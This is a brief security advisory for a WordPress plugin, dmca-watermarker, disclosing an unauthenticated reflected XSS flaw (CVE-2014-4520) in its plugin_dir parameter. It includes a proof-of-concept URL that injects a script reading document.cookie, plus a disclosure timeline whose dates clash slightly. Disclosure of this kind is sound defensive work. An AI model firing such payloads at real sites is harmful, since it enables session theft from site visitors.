wp-plugin : dmca-watermarker

Plugin Details
Plugin Name: wp-plugin : dmca-watermarker
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

PoC:http://locahost/wordpress/wp-content/wp-plugs/dmcawatermarker/phprack.php?plugin_dir=plugin_dir%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : plugin_dir

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=904684%40dmca-watermarker&old=549072%40dmca-watermarker


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4520
Plugin Description :
[| The DMCA.com WaterMarker plugin for WordPress allows you to easily integrate DMCA.com's WaterMarking for a specific folder into your WordPress site. For more information about the features & benefits of the service visit [DMCA.com](http://www.dmca.com/protection.aspx?ad=wpo) [» Register](http://www.dmca.com/Badges.aspx?ad=wpo) | [» Learn More](http://www.dmca.com/Protection.aspx?ad=wpo) | [» Upgrade to Pro](https://www.dmca.com/Toolkit/signup.aspx?lnk=wps&mpi=DMCA%20Toolkit) Once installed and activated, you can use the DMCA WaterMarker page in your Dashboard's Settings Menu to specify how your choice of badge should be displayed in posts and pages. You can also choose to display your badge site-wide using the DMCA Badge Widget. You can use the badges for free but we suggest that you sign up for an account at dmca.com in order to receive the full benefit of the certified badges. ]